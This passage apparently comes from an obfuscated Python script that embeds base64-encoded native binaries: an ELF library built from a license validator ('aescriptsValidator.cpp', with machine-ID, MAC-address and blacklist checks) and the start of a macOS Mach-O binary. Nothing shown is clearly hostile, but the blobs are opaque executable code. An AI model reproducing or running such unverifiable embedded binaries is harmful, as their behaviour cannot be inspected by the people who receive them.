AAAAAAAAAA
AeIQAAAAAAAAQAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAEiNAAAAAAAA6BEAAAAAAAAeAAAASgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAwnwAAAAAAAG8SAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQAAAkAAAAAAAAAAAAAAAAAAAAAAAAMAAgAcAkAAAAAAAAAAAAAAAAAAAAAAAAMAAwA8AkAAAAAAAAAAAAAAAAAAAAAAAAMABABgAkAAAAAAAAAAAAAAAAAAAAAAAAMABQCYAkAAAAAAAAAAAAAAAAAAAAAAAAMABgDQCUAAAAAAAAAAAAAAAAAAAAAAAAMABwBQEUAAAAAAAAAAAAAAAAAAAAAAAAMACADwEUAAAAAAAAAAAAAAAAAAAAAAAAMACQBgEkAAAAAAAAAAAAAAAAAAAAAAAAMACgCQEkAAAAAAAAAAAAAAAAAAAAAAAAMACwA4GUAAAAAAAAAAAAAAAAAAAAAAAAMADABQGUAAAAAAAAAAAAAAAAAAAAAAAAMADQDQHUAAAAAAAAAAAAAAAAAAAAAAAAMADgCYbEAAAAAAAAAAAAAAAAAAAAAAAAMADwCwbEAAAAAAAAAAAAAAAAAAAAAAAAMAEADIbkAAAAAAAAAAAAAAAAAAAAAAAAMAEQCIcEAAAAAAAAAAAAAAAAAAAAAAAAMAEgC0eEAAAAAAAAAAAAAAAAAAAAAAAAMAEwAAgGAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYgGAAAAAAAAAAAAAAAAAAAAAAAAMAFQAogGAAAAAAAAAAAAAAAAAAAAAAAAMAFgAwgGAAAAAAAAAAAAAAAAAAAAAAAAMAFwDwgWAAAAAAAAAAAAAAAAAAAAAAAAMAGAD4gWAAAAAAAAAAAAAAAAAAAAAAAAMAGQBIhGAAAAAAAAAAAAAAAAAAAAAAAAMAGgBghGAAAAAAAAAAAAAAAAAAAAAAAAMAGwAAAAAAAAAAAAAAAAAAAAAAAQAAAAIADQD8HUAAAAAAAAAAAAAAAAAAEQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAHAAAAAEAEwAAgGA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AAAAAAAAAAAAAAAAAYQ0AABIAAAAAAAAAAAAAAAAAAAAAAAAAfQ0AABIAAAAAAAAAAAAAAAAAAAAAAAAAkQ0AABIAAAAAAAAAAAAAAAAAAAAAAAAApQ0AACAAAAAAAAAAAAAAAAAAAAAAAAAAtA0AABIAAAAAAAAAAAAAAAAAAAAAAAAA0g0AABIAAAAAAAAAAAAAAAAAAAAAAAAAFA4AABIAAAAAAAAAAAAAAAAAAAAAAAAAYw4AABAA8f+IhWAAAAAAAAAAAAAAAAAAaA4AABIAAAAAAAAAAAAAAAAAAAAAAAAAhg4AACIADQCEaEAAAAAAABIAAAAAAAAAkQ4AABIAAAAAAAAAAAAAAAAAAAAAAAAA4A4AABIAAAAAAAAAAAAAAAAAAAAAAAAA/A4AABIAAAAAAAAAAAAAAAAAAAAAAAAAFA8AABIAAADQHEAAAAAAAAAAAAAAAAAAXA8AABIAAAAAAAAAAAAAAAAAAAAAAAAAeg8AABIAAAAAAAAAAAAAAAAAAAAAAAAAvw8AABIAAAAAAAAAAAAAAAAAAAAAAAAA3g8AACIADQAeZ0AAAAAAADwAAAAAAAAA/Q8AABAA8f9MhGAAAAAAAAAAAAAAAAAABBAAABIAAAAAAAAAAAAAAAAAAAAAAAAAHhAAABIAAAAgHUAAAAAAAAAAAAAAAAAAPxAAABIAAAAAAAAAAAAAAAAAAAAAAAAAhxAAACIADQBaZ0AAAAAAABQAAAAAAAAAoRAAABIAAAAAAAAAAAAAAAAAAAAAAAAAuRAAABIAAAAAAAA
AAAAAAAAAAAAAAAAA0xAAABIAAAAAAAAAAAAAAAAAAAAAAAAA+xAAABIAAAAAAAAAAAAAAAAAAAAAAAAAGhEAABIADQCwKEAAAAAAAEoGAAAAAAAATxEAABIAAAAAAAAAAAAAAAAAAAAAAAAAbREAABIAAAAAAAAAAAAAAAAAAAAAAAAAuhEAABIAAAAAAAAAAAAAAAAAAAAAAAAADxIAABIAAAAAAAAAAAAAAAAAAAAAAAAAURIAABIAAAAAAAAAAAAAAAAAAAAAAAAAZBIAABIADQCjY0AAAAAAACUDAAAAAAAAaRIAABIACwA4GUAAAAAAAAAAAAAAAAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC42MzQ5AGR0b3JfaWR4LjYzNTEAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGFlc2NyaXB0c1ZhbGlkYXRvci5jcHAAX1pTdEw4X19pb2luaXQAX1pOOWFlc2NyaXB0c0wxNmJ1Zl90b19oZXhzdHJpbmdFUGhqAF9aTjlhZXNjcmlwdHNMMTZoZXhzdHJpbmdfdG9fYnVmRVBoalMwXwBfWkwxMkJpdF9NYW5nbGVfMWlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzJpaWlpaWlpAF9aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfWkwxMkJpdF9NYW5nbGVfNGlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzVpaWlpaWlpAF9aTDE0YmxhY2tMaXN0QXJyYXkAX1pMOHNtb2R1bHVzaWkAX1pMOG51bXRvc3RyagBfWkw5bG9uZ3Rvc3RyeQBfWkwxMW51bXRvaGV4c3RyagBfWkw5cGFkRGlnaXRzU3NqAF9aTDhjaHJSZW1hcGNQU3MAX1pMOGtleVJlbWFwalBTc2kAX1pMOWtleVdpemFyZGpqalBQRmlpaWlpaWlpRVBTc2JpAF9aTDE4SXNMaWNlbnNlVHlwZVZhbGlkU3MAX1pMMTFSZW1vdmVTdGVwc1JTc2ppU19TXwBfWkwxNWdldENoZWNrc3VtX29sZFNzU3MAX1pMMTFnZXRDaGVja3N1bVNzU3MAX1pMMTJnZXRWZXJpZkNvZGVTc2oAX1pMMTBnZXREZXRhaWxzUlNzU19TX1NfU18AX1pMMTJnZXRQdWJsaWNLZXlTc2lpAF9aNDFfX3N0YXRpY19pbml0aWFsaXphdGlvbl9hbmRfZGVzdHJ1Y3Rpb25fMGlpAF9HTE9CQUxfX0lfX1pOOWFlc2NyaXB0czEyZ2V0TWFjaGluZUlkRVJBMTI4X2MAX1paTDE4X19ndGhyZWFkX2FjdGl2ZV9wdkUyMF9fZ3RocmVhZF9hY3RpdmVfcHRyAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfX2luaXRfYXJyYXlfZW5kAF9faW5pdF9hcnJheV9zdGFydABfRFlOQU1JQwBkYXRhX3N0YXJ0AF9aTlN0OGlvc19iYXNlNHNldGZFU3QxM19Jb3NfRm10ZmxhZ3NTMF8AX1pOOWFlc2NyaXB0czEzT3V0QXNVbnNpZ25lZEVjAF9aTlNzYVNFUEtjQEBHTElCQ1hYXzMuNABfWk5Tc0MxRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2QEBHTElCQ1hYXzMuNABfWk5Tb2xzRWlAQEdMSUJDWFhfMy40AF9aTlNzcExFUEtjQEBHTElCQ1hYXzMuNABtZW1zZXRAQEdMSUJDXzIuMi41AF9fbGl
iY19jc3VfZmluaQBfWk5TczVjbGVhckV2QEBHTElCQ1hYXzMuNABzaHV0ZG93bkBAR0xJQkNfMi4yLjUAX3N0YXJ0AF9aU3RwbEljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFU2JJVF9UMF9UMV9FUktTNl9TOF8AX1pTdG9yU3QxM19Jb3NfRm10ZmxhZ3NTXwBfWk5LU3M2c3Vic3RyRW1tQEBHTElCQ1hYXzMuNABpb2N0bEBAR0xJQkNfMi4yLjUAX1pOU3NwTEVjQEBHTElCQ1hYXzMuNABfX2dtb25fc3RhcnRfXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAF9aTktTczVjX3N0ckV2QEBHTElCQ1hYXzMuNABfWm5hbUBAR0xJQkNYWF8zLjQAX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0QWxsTUFDQWRkcmVzc2VzRVBoAF9maW5pAF9aTlNpNXRlbGxnRXZAQEdMSUJDWFhfMy40AF9aTktTczRzaXplRXZAQEdMSUJDWFhfMy40AF9aTlN0OGlvc19iYXNlNEluaXRDMUV2QEBHTElCQ1hYXzMuNABfWjE4Y2hlY2tCbGFja0xpc3Rfb2xkaWkAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMi41AF9aU3RvclN0MTNfSW9zX09wZW5tb2RlU18AX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X2hAQEdMSUJDWFhfMy40AF9aTlNpNXNlZWtnRWxTdDEyX0lvc19TZWVrZGlyQEBHTElCQ1hYXzMuNABfWlN0b1JSU3QxM19Jb3NfRm10ZmxhZ3NTXwBfWk5Tc0MxRVJLU3NAQEdMSUJDWFhfMy40AF9fY3hhX2F0ZXhpdEBAR0xJQkNfMi4yLjUAX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0TUFDQWRkcmVzc0xpbnV4RVBoAF9aTlNpNHJlYWRFUGNsQEBHTElCQ1hYXzMuNABfWjE0Y2hlY2tCbGFja0xpc3RpaWlpAF9aTktTczZsZW5ndGhFdkBAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czExTGljZW5zZURhdGFDMkV2AF9aTlN0OGlvc19iYXNlNEluaXREMUV2QEBHTElCQ1hYXzMuNABnZXRwd3VpZEBAR0xJQkNfMi4yLjUAX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X1BLY0BAR0xJQkNYWF8zLjQAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1BLUzNfAF9JT19zdGRpbl91c2VkAF9aTlNvNXdyaXRlRVBLY2xAQEdMSUJDWFhfMy40AF9aTlNzRDFFdkBAR0xJQkNYWF8zLjQAX19kYXRhX3N0YXJ0AF9aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAGJjb3B5QEBHTElCQ18yLjIuNQBzcHJpbnRmQEBHTElCQ18yLjIuNQBfWk5Tc3BMRVJLU3NAQEdMSUJDWFhfMy40AF9aU3Rjb1N0MTNfSW9zX0ZtdGZsYWdzAF9aU3Q3c2V0ZmlsbEljRVN0OF9TZXRmaWxsSVRfRVMxXwBfWlN0M2hleFJTdDhpb3NfYmFzZQBfWjRrZXkxU3NpAGF0b2xAQEdMSUJDXzIuMi41AF9aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX1pOU3NDMUVQS2NSS1NhSWNFQEBHTElCQ1hYXzMuNABfWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQS2NQYwBfWlN0NGNvdXRAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJ
fdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aMTRtYWtlU2VlZHNBcnJheVNzaQBfX2Rzb19oYW5kbGUAX1pTdGFOUlN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOU3NpeEVtQEBHTElCQ1hYXzMuNABfX0RUT1JfRU5EX18AX19saWJjX2NzdV9pbml0AGF0b2lAQEdMSUJDXzIuMi41AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfWk5Tb2xzRWpAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxOWxvYWRMaWNlbnNlRnJvbUZpbGVFUEtjUkExMjhfYwBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdkBAR0xJQkNYWF8zLjQAc29ja2V0QEBHTElCQ18yLjIuNQBfWk5LU3Q0ZnBvc0kxMV9fbWJzdGF0ZV90RWN2bEV2AF9aMTNyZXZlcnNlU3RyaW5nU3MAX19ic3Nfc3RhcnQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzdfUktTYklTNF9TNV9UMV9FQEBHTElCQ1hYXzMuNABzdHJjbXBAQEdMSUJDXzIuMi41AF9aTlNhSWNFRDFFdkBAR0xJQkNYWF8zLjQAc3RyY3B5QEBHTElCQ18yLjIuNQBfWk5TczVlcmFzZUVtbUBAR0xJQkNYWF8zLjQAZ2V0dWlkQEBHTElCQ18yLjIuNQBfWmRhUHZAQEdMSUJDWFhfMy40AHB0aHJlYWRfY2FuY2VsAF9aTlNzNmFwcGVuZEVQS2NAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfZW5kAF9aTlNvbHNFUEZSU29TX0VAQEdMSUJDWFhfMy40AF9aU3Q0c2V0d2kAX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGVAQEdMSUJDWFhfMy40AF9fY3hhX2VuZF9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TaXJzRVJtQEBHTElCQ1hYXzMuNABfWlN0NGVuZGxJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfQEBHTElCQ1hYXzMuNABfX2N4YV9iZWdpbl9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2QEBHTElCQ1hYXzMuNABfWk5TczlwdXNoX2JhY2tFY0BAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czExTGljZW5zZURhdGFDMUV2AF9lZGF0YQBfWk5TYUljRUMxRXZAQEdMSUJDWFhfMy40AF9fZ3h4X3BlcnNvbmFsaXR5X3YwQEBDWFhBQklfMS4zAF9aTktTdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUUzc3RyRXZAQEdMSUJDWFhfMy40AF9aU3RhblN0MTNfSW9zX0Z
tdGZsYWdzU18AX1Vud2luZF9SZXN1bWVAQEdDQ18zLjAAX1pOU3NhU0VSS1NzQEBHTElCQ1hYXzMuNABfWk5Tb2xzRVBGUlN0OGlvc19iYXNlUzBfRUBAR0xJQkNYWF8zLjQAX1pOU3M2YXBwZW5kRVJLU3NAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxNXZhbGlkYXRlTGljZW5zZUVQY2lSTlNfMTFMaWNlbnNlRGF0YUUAX1pOS1NzNGZpbmRFUEtjbUBAR0xJQkNYWF8zLjQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2X1N0NV9TZXR3QEBHTElCQ1hYXzMuNABfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q4X1NldGZpbGxJUzNfRUBAR0xJQkNYWF8zLjQAX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFN2lzX29wZW5FdkBAR0xJQkNYWF8zLjQAbWtkaXJAQEdMSUJDXzIuMi41AG1haW4AX2luaXQA')
return R
raise Exception('unsupported operating system:' + bw())
def ertuze(a):
if a.__isMacOs():
R = at(
'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